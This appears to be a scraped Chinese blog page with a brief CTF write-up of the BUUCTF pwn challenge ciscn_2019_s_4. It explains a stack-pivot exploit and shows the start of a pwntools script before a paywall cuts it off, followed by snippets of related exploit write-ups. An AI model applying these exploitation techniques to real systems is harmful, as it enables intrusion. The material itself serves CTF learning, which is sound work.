【pwn】 ciscn_2019_s_4

最新推荐文章于 2025-03-23 15:56:15 发布

原创

最新推荐文章于 2025-03-23 15:56:15 发布 · 894 阅读

0 ·

CC 4.0 BY-SA版权

本文详细探讨了CISCN_2019_S_4挑战中涉及的栈溢出漏洞。通过分析main函数，发现存在8字节的缓冲区溢出。在栈迁移过程中，首次泄露了ebp，从而获取到栈上buf的精确地址。进一步的操作是将控制权转移到buf，以实现漏洞的利用。

main函数，存在八个字节溢出，栈迁移，第一次泄露ebp，得到栈上buf地址，迁移到buf即可。

from pwn import *

io=remote('node3.buuoj.cn',28060)

leave=0x8048562
sys_plt=0x8048400

pl1='a'*0x24+'bbbb'
io.send(pl1

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

不干正事的拖延症患者

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ciscn_2019_s_4

doudoudedi

01-26

1079

可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...

[BUUCTF-pwn]——ciscn_2019_s_4

Y_peak的博客

03-12

608

[BUUCTF-pwn]——ciscn_2019_s_4 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_4 这道题是一道典型的栈劫持问题前面有一道类似的,(挂了peak小知识), 如果需要可以去做一下没有开启canary保护在IDA中, 可以看出有明显的栈溢出, 不过溢出空间只够修改ebp和一个返回地址但是, 仅仅一个返回地址是不够的, 并不能打印flag 思路利用栈溢出,首先泄露出来main_ebp的地址计算一下,我们输入的位置, 距离m

3 条评论您还未登录，请先登录后发表或查看评论

栈迁移图解

qq_40410406的博客

11-11

1770

栈迁移场景 1 如果程序的保护措施canary开启，会在prev ebp栈空间的下一个低地址存放一个随机值，当我们溢出时会将这个随机值覆盖，程序检测到这个随机值发生变化以后会自动退出（崩溃），此时就无法进行栈溢出攻击，所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断，且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护，就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge

ciscn2019 pwn3

pondzhang的专栏

05-26

513

from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin

BUU刷题-Pwn-ciscn_2019_en_2（和BUU刷题ciscn_2019_c_1为同一题）

一个啥也不会的小菜鸡！

06-21

269

是一个菜单题，有一个栈溢出漏洞，但里面有字符串加密逻辑，绕过后才可以使用栈溢出。而且本题中没有后门函数等，所以需要自己去寻找，首先泄露除一个函数地址，进而计算出system和“/bin/sh”的位置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离：0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]

BUUCTF PWN ciscn_2019_s_9

Rt1Text的博客

04-22

349

1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数提示函数,很有帮助,解题关键点直接跳到esp栈顶指针 2.pwn函数明显的fgets()函数溢出跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..

[CTF]BUUCTF-PWN-ciscn_2019_en_2

weixin_53394081的博客

04-11

467

【CTF】BUUCTF-ciscn_2019_en_2 pwn

[BUUCTF]-PWN:ciscn_2019_es_7解析（系统调用execve，srop）

2301_79326813的博客

01-30

635

这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位，没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数，这就提示我们可以用系统调用来getshell。

BUUCTF ciscn_2019_s_9

最新发布

2401_85052854的博客

03-23

380

通过观察，在ret中执行的jmp esp的操作，指向的是我们最后写上“sub esp,40;call esp”这样的操作，shellcode的位置距离现在的esp为0x28，也就是40，所以要进行“sub esp,40;有个jmp esp的操作，我们可以利用这个指令直接跳转到我们从栈上写入shellcode的位置进行getshell，通过观察栈上的空间太少，pwntool生成的shellcode太长，我们只能手写短一点的shellcode了，以下是exp。checksec一下发现什么保护都没开。

your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛

04-22

pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛

baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛

04-22

baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛

buuctf ciscn_2019_s_4 pwn wp

weixin_44740530的博客

04-21

430

buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18

ciscn_2019_s_4 [write up]

m0_73756460的博客

01-14

332

buuctf刷题 ciscn_2019_s_4 【write up】

Pwn-Ciscn_2019_Final

fayinq的博客

03-11

503

Ciscn_2019_Final 感觉是一道很好的堆题，使用了很多技巧以及做题思路，包括了uaf，_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析： main函数： init函数：沙箱：（少截取一点为无所谓） allocate函数：这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数： del有一段特殊判定，就是bool的判定，因为bool的存在，导致了没有办法连续释放i

【pwn】 ciscn_2019_final_3

Nothing

12-18

1786

例行检查保护全开，分析程序。 add函数只能申请小于0x78大小的chunk，chunk数量不能超过24个，且题目给了申请到内存空间的地址。 free函数 free后指针没有置0，且libc是2.27的，存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin，存在tcache的情况下，64位程序需要申请超过0x400大小chunk，fre...

【Pwn】BUUCTF ciscn_2019_s_4 wp 栈迁移

Lcw_linyx的博客

05-20

706

个人日记= =，记录pwn自己的自闭过程

ciscn_2019_s_4-栈迁移

个人笔记

06-07

832

思路：由于无直接getshell的利用函数，溢出空间只有8字节（ebp+ret占用无法继续填充ROP了），所以需要栈迁移更大的空间来构造ROP。栈迁移位置：执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此栈帧迁移到s[40]数组的位置，先通过第一次打印泄露s[40]的起始地址。栈迁移核心（通过ROPGadget寻找。ebp位置：栈迁移位置-4（32位）ret位置：leave_ret。题目类型猜测：栈溢出，栈迁移。作用：赋值执行函数调用。

2019CISCN华南赛区半决赛 pwn

qq_41071646的博客

12-09

1028

好久没有练过pwn了，，感觉自己pwn 都废了，，近期打算刷一下攻防世界的android 然后刷刷这个华南赛区的pwn。如果刷的差不多打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思感觉出题人费心了 edit 函数已经给限制了然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...

ciscn_2019_pwn挑战赛：破解五道经典题目解析

资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目，分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力，以及对操作系统底层安全的深刻理解。接...